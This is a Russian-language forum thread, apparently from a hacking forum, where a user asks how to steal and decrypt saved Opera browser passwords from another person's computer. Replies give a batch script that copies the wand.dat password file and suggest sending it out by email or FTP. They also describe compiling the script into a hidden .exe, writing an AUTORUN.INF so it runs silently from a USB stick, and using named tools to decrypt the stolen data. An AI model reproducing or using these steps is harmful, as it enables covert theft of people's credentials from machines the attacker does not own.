Всем привет, сразу извиняюсь за возможную ошибку при выборе раздела и т.д. Подскажите , пожалуйста, мне нужно каким-то образом стянуть сохранившиеся пароли из оперы и расшифровать их. Желательно это реализвать дистанционно, но в принципе я могу получить доступ к компьютеру. Каким образом я могу сделать это?
Пример: *.bat Code: cd %APPDATA%\Opera\Opera\ >nul copy wand.dat C:\wand.dat >nul дальше думаю найдёшь информацию как отправить файл,например на почту или ftp. Если есть познания в программировании,то думаю труда не составит или допиши *.bat. Пароли расшифруешь MPR или аналогом.
Если как ты написал, можешь получить доступ к компьютеру. Воспользуйся тулзой из темы: https://forum.antichat.ru/thread234251.html так же есть версия и под оперу
прога MPR (Multi Password Recovery) - таскает пароли почти из всех браузеров, почтовых, ICQ, IRC клиентов и еще много из чего. Ставишь ее, она тут же выдает ВСЕ сохраненные пароли на машине (из программ которые поддерживает). Не раз помогала, короче мастхев
Сделал боьник чтобы пароли от оперы скидались на флешку: И ищо желательно надо прога Quick Batch File Compiler, чтобы .bat поменять на .exe и там есть функцыя чтобы командная строка при копировании wand.dat на флеху не отображалась...
На флехе можно создать файл AUTORUN.INF с таким содержанием: [autorun] open=имя вируса.bat или .exe icon=имя иконки флехи p.s. Открывать wand.dat прогой "Unwand". p.s.s. Ищо могу сделать чтобы тырило пасы из мазилы...